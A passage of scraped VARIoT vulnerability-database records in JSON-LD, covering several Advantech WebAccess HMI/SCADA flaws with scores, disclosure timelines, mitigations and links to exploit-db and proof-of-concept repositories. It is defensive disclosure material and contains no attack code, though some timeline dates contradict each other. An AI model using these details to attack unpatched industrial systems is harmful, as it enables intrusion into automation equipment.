"CNVD-2020-29743" }, { "db": "VULHUB", "id": "VHN-164641" }, { "db": "VULMON", "id": "CVE-2020-12006" }, { "db": "JVNDB", "id": "JVNDB-2020-005162" }, { "db": "CNNVD", "id": "CNNVD-202005-306" }, { "db": "NVD", "id": "CVE-2020-12006" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "ec7b8103-b626-4a4f-985f-bd5bdbb95287", "ident": null }, { "db": "IVD", "id": "2d8fc349-4a01-4fa6-8792-ddceae01196f", "ident": null }, { "db": "ZDI", "id": "ZDI-20-595", "ident": null }, { "db": "ZDI", "id": "ZDI-20-589", "ident": null }, { "db": "ZDI", "id": "ZDI-20-605", "ident": null }, { "db": "CNVD", "id": "CNVD-2020-29743", "ident": null }, { "db": "VULHUB", "id": "VHN-164641", "ident": null }, { "db": "VULMON", "id": "CVE-2020-12006", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2020-005162", "ident": null }, { "db": "CNNVD", "id": "CNNVD-202005-306", "ident": null }, { "db": "NVD", "id": "CVE-2020-12006", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2020-05-07T00:00:00", "db": "IVD", "id": "ec7b8103-b626-4a4f-985f-bd5bdbb95287", "ident": null }, { "date": "2020-05-07T00:00:00", "db": "IVD", "id": "2d8fc349-4a01-4fa6-8792-ddceae01196f", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-595", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-589", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-605", "ident": null }, { "date": "2020-05-25T00:00:00", "db": "CNVD", "id": "CNVD-2020-29743", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "VULHUB", "id": "VHN-164641", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "VULMON", "id": "CVE-2020-12006", "ident": null }, { "date": "2020-06-08T00:00:00", "db": "JVNDB", "id": "JVNDB-2020-005162", "ident": null }, { "date": "2020-05-07T00:00:00", "db": "CNNVD", "id": "CNNVD-202005-306", "ident": null }, { "date": "2020-05-08T12:15:11.160000", "db": "NVD", "id": "CVE-2020-12006", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-595", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-589", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-605", "ident": null }, { "date": "2020-05-25T00:00:00", "db": "CNVD", "id": "CNVD-2020-29743", "ident": null }, { "date": "2021-09-23T00:00:00", "db": "VULHUB", "id": "VHN-164641", "ident": null }, { "date": "2020-05-12T00:00:00", "db": "VULMON", "id": "CVE-2020-12006", "ident": null }, { "date": "2020-06-08T00:00:00", "db": "JVNDB", "id": "JVNDB-2020-005162", "ident": null }, { "date": "2021-01-04T00:00:00", "db": "CNNVD", "id": "CNNVD-202005-306", "ident": null }, { "date": "2024-11-21T04:59:06.080000", "db": "NVD", "id": "CVE-2020-12006", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-202005-306" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess Node Past Traversal Vulnerability in", "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-005162" } ], "trust": 0.8 }, "type": { "_id": null, "data": "Path traversal", "sources": [ { "db": "IVD", "id": "ec7b8103-b626-4a4f-985f-bd5bdbb95287" }, { "db": "IVD", "id": "2d8fc349-4a01-4fa6-8792-ddceae01196f" }, { "db": "CNNVD", "id": "CNNVD-202005-306" } ], "trust": 1.0 } }
var-201602-0469
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C80 IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to strcpy. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201602-0469", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-151" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-16-151" } ], "trust": 0.7 }, "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "ZDI-16-151", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-16-151", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-151" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C80 IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to strcpy. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "sources": [ { "db": "ZDI", "id": "ZDI-16-151" } ], "trust": 0.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-3156", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-151", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-151" } ] }, "id": "VAR-201602-0469", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:04:33.100000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI vulnerability disclosure policy on lack of vendor response.09/15/2015 - 09/17/2015 - ZDI disclosed reports to ICS-CERT (+1 more on 9/29/2015).09/15/2015 and 09/17/2015 - ICS-CERT acknowledged with a tracking number.10/06/2015 - ICS-CERT advised ZDI that the vendor was working on a patch tentatively planned for November.11/10/2015 - ICS-CERT advised ZDI that this patch/next version would be released in early December.12/14/2015 - ZDI asked ICS-CERT if a patch was available. 12/15/2015 - ICS-CERT advised ZDI that a patch release was expected \"any day now.\"12/15/2015 - ICS-CERT inquired with the vendor about the patch.01/06/2016 - ICS-CERT advised ZDI that the vendor released WebAccess 8.1.01/06/2016 - ZDI asked ICS-CERT what fixes are supposed to be in the build. 01/13/2016 - ICS-CERT provided ZDI with a written draft advisory.01/15/2016 - ICS-CERT published an advisory.01/15/2016 - ZDI asked ICS-CERT to confirm CVE mapping.01/22/2016 and 01/26/2016 - ZDI discussed with ICS-CERT by phone the concern that the patch seemed incomplete.01/27/2015 - ZDI concluded that this cases is not patched.02/01/2015 - ZDI notified ICS-CERT intent to release a 0-day advisory02/02/2015 - ZDI advisory released.-- Mitigation:Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting. These features are available in the native Windows Firewall, as described in and numerous other Microsoft Knowledge Base articles.", "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-151" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-151" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "ZDI", "id": "ZDI-16-151" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-151" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-151" } ] }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "(0Day) Advantech WebAccess webvrpcs Service BwWebSvc.dll strcpy Stack-Based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-16-151" } ], "trust": 0.7 } }
var-201810-0131
Vulnerability from variot
Advantech WebAccess 8.3.1 and 8.3.2 are vulnerable to cross-site scripting in the Bwmainleft.asp page. An attacker could leverage this vulnerability to disclose credentials amongst other things. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201810-0131", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 3.0, "vendor": "advantech", "version": "8.3.1" }, { "model": "webaccess", "scope": "eq", "trust": 3.0, "vendor": "advantech", "version": "8.3.2" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "8.3.1" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "8.3.2" } ], "sources": [ { "db": "IVD", "id": "e300ebb1-39ab-11e9-a0a4-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-22714" }, { "db": "JVNDB", "id": "JVNDB-2018-011789" }, { "db": "CNNVD", "id": "CNNVD-201810-1564" }, { "db": "NVD", "id": "CVE-2018-15707" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-011789" } ] }, "cve": "CVE-2018-15707", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "exploitabilityScore": 6.8, "id": "CVE-2018-15707", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "LOW", "trust": 1.9, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "CNVD-2018-22714", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "e300ebb1-39ab-11e9-a0a4-000c29342cb1", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "exploitabilityScore": 6.8, "id": "VHN-125993", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "LOW", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:S/C:N/I:P/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "exploitabilityScore": 2.3, "id": "CVE-2018-15707", "impactScore": 2.7, "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "trust": 1.8, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2018-15707", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2018-15707", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2018-22714", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201810-1564", "trust": 0.6, "value": "LOW" }, { "author": "IVD", "id": "e300ebb1-39ab-11e9-a0a4-000c29342cb1", "trust": 0.2, "value": "LOW" }, { "author": "VULHUB", "id": "VHN-125993", "trust": 0.1, "value": "LOW" }, { "author": "VULMON", "id": "CVE-2018-15707", "trust": 0.1, "value": "LOW" } ] } ], "sources": [ { "db": "IVD", "id": "e300ebb1-39ab-11e9-a0a4-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-22714" }, { "db": "VULHUB", "id": "VHN-125993" }, { "db": "VULMON", "id": "CVE-2018-15707" }, { "db": "JVNDB", "id": "JVNDB-2018-011789" }, { "db": "CNNVD", "id": "CNNVD-201810-1564" }, { "db": "NVD", "id": "CVE-2018-15707" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess 8.3.1 and 8.3.2 are vulnerable to cross-site scripting in the Bwmainleft.asp page. An attacker could leverage this vulnerability to disclose credentials amongst other things. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment", "sources": [ { "db": "NVD", "id": "CVE-2018-15707" }, { "db": "JVNDB", "id": "JVNDB-2018-011789" }, { "db": "CNVD", "id": "CNVD-2018-22714" }, { "db": "IVD", "id": "e300ebb1-39ab-11e9-a0a4-000c29342cb1" }, { "db": "VULHUB", "id": "VHN-125993" }, { "db": "VULMON", "id": "CVE-2018-15707" } ], "trust": 2.52 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-125993", "trust": 0.1, "type": "unknown" }, { "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=45774", "trust": 0.1, "type": "exploit" } ], "sources": [ { "db": "VULHUB", "id": "VHN-125993" }, { "db": "VULMON", "id": "CVE-2018-15707" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2018-15707", "trust": 3.4 }, { "db": "TENABLE", "id": "TRA-2018-35", "trust": 3.2 }, { "db": "EXPLOIT-DB", "id": "45774", "trust": 1.2 }, { "db": "CNNVD", "id": "CNNVD-201810-1564", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2018-22714", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2018-011789", "trust": 0.8 }, { "db": "IVD", "id": "E300EBB1-39AB-11E9-A0A4-000C29342CB1", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-125993", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2018-15707", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "e300ebb1-39ab-11e9-a0a4-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-22714" }, { "db": "VULHUB", "id": "VHN-125993" }, { "db": "VULMON", "id": "CVE-2018-15707" }, { "db": "JVNDB", "id": "JVNDB-2018-011789" }, { "db": "CNNVD", "id": "CNNVD-201810-1564" }, { "db": "NVD", "id": "CVE-2018-15707" } ] }, "id": "VAR-201810-0131", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "e300ebb1-39ab-11e9-a0a4-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-22714" }, { "db": "VULHUB", "id": "VHN-125993" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e300ebb1-39ab-11e9-a0a4-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-22714" } ] }, "last_update_date": "2024-11-23T21:52:47.829000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess/webaccessscada" }, { "title": "Advantech WebAccess Bwmainleft.asp page cross-site scripting vulnerability patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/143979" }, { "title": "Exp101tsArchiv30thers", "trust": 0.1, "url": "https://github.com/nu11secur1ty/Exp101tsArchiv30thers " }, { "title": "", "trust": 0.1, "url": "https://github.com/lnick2023/nicenice " }, { "title": "awesome-cve-poc_qazbnm456", "trust": 0.1, "url": "https://github.com/xbl3/awesome-cve-poc_qazbnm456 " } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-22714" }, { "db": "VULMON", "id": "CVE-2018-15707" }, { "db": "JVNDB", "id": "JVNDB-2018-011789" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-79", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-125993" }, { "db": "JVNDB", "id": "JVNDB-2018-011789" }, { "db": "NVD", "id": "CVE-2018-15707" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.2, "url": "https://www.tenable.com/security/research/tra-2018-35" }, { "trust": 1.3, "url": "https://www.exploit-db.com/exploits/45774/" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-15707" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-15707" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/79.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-22714" }, { "db": "VULHUB", "id": "VHN-125993" }, { "db": "VULMON", "id": "CVE-2018-15707" }, { "db": "JVNDB", "id": "JVNDB-2018-011789" }, { "db": "CNNVD", "id": "CNNVD-201810-1564" }, { "db": "NVD", "id": "CVE-2018-15707" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "e300ebb1-39ab-11e9-a0a4-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-22714" }, { "db": "VULHUB", "id": "VHN-125993" }, { "db": "VULMON", "id": "CVE-2018-15707" }, { "db": "JVNDB", "id": "JVNDB-2018-011789" }, { "db": "CNNVD", "id": "CNNVD-201810-1564" }, { "db": "NVD", "id": "CVE-2018-15707" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-11-08T00:00:00", "db": "IVD", "id": "e300ebb1-39ab-11e9-a0a4-000c29342cb1" }, { "date": "2018-11-07T00:00:00", "db": "CNVD", "id": "CNVD-2018-22714" }, { "date": "2018-10-31T00:00:00", "db": "VULHUB", "id": "VHN-125993" }, { "date": "2018-10-31T00:00:00", "db": "VULMON", "id": "CVE-2018-15707" }, { "date": "2019-01-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-011789" }, { "date": "2018-11-01T00:00:00", "db": "CNNVD", "id": "CNNVD-201810-1564" }, { "date": "2018-10-31T22:29:00.523000", "db": "NVD", "id": "CVE-2018-15707" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-11-08T00:00:00", "db": "CNVD", "id": "CNVD-2018-22714" }, { "date": "2018-12-12T00:00:00", "db": "VULHUB", "id": "VHN-125993" }, { "date": "2018-12-12T00:00:00", "db": "VULMON", "id": "CVE-2018-15707" }, { "date": "2019-01-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-011789" }, { "date": "2018-11-01T00:00:00", "db": "CNNVD", "id": "CNNVD-201810-1564" }, { "date": "2024-11-21T03:51:18.900000", "db": "NVD", "id": "CVE-2018-15707" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201810-1564" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Bwmainleft.asp Page Cross-Site Scripting Vulnerability", "sources": [ { "db": "IVD", "id": "e300ebb1-39ab-11e9-a0a4-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-22714" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "XSS", "sources": [ { "db": "CNNVD", "id": "CNNVD-201810-1564" } ], "trust": 0.6 } }
var-201708-1117
Vulnerability from variot
An Externally Controlled Format String issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. String format specifiers based on user provided input are not properly validated, which could allow an attacker to execute arbitrary code. Advantech WebAccess Contains a format string vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple stack-based buffer-overflow vulnerabilities 2. Multiple heap-based buffer-overflow vulnerabilities. 3. Multiple memory-corruption vulnerabilities. 4. An SQL-injection vulnerability. 5. A format-string vulnerability. 6. An authentication-bypass vulnerability. 7. A security-bypass vulnerability. 8. A privilege-escalation vulnerability. 9. A remote-code execution vulnerability. An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database,perform certain unauthorized actions, gain unauthorized access and gain elevated privileges. This may aid in further attacks. Advantech WebAccess versions prior to V8.2_20170817 are vulnerable
